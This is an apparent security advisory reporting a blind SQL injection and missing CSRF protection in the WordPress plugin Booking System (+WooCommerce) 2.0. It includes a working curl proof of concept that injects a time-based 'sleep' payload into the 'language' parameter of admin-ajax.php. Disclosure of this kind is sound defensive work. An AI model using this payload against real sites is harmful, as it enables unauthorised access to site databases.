Subject: Blind SQL injection in Booking System (+WooCommerce) 2.0
Date: Tue, 7 Jul 2015 11:27:13 +0200

Hello,

Plugin: Booking System (+WooCommerce) 2.0

Remote authenticated users (subcriber, editor, etc.) can execute arbitrary SQL commands (+ there is no CSRF protection).

1. SQL injection (DOPBSPBackEndTranslation::display())

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php
Parameter: language


Example PHP callstack:
  DOPBSPBackEndTranslation::display   [/booking-system/includes/translation/class-backend-translation.php:43]
  wpdb::get_results  

Verification: 

curl --cookie "..." --request POST --data "action=dopbsp_translation_display&language=en t1 where id=(select sleep(10))-- -&text_group=all" http://localhost/wp-admin/admin-ajax.php


--
Pozdrawiam,
Marcin Probola,
https://wordpress.org/plugins/booking-system/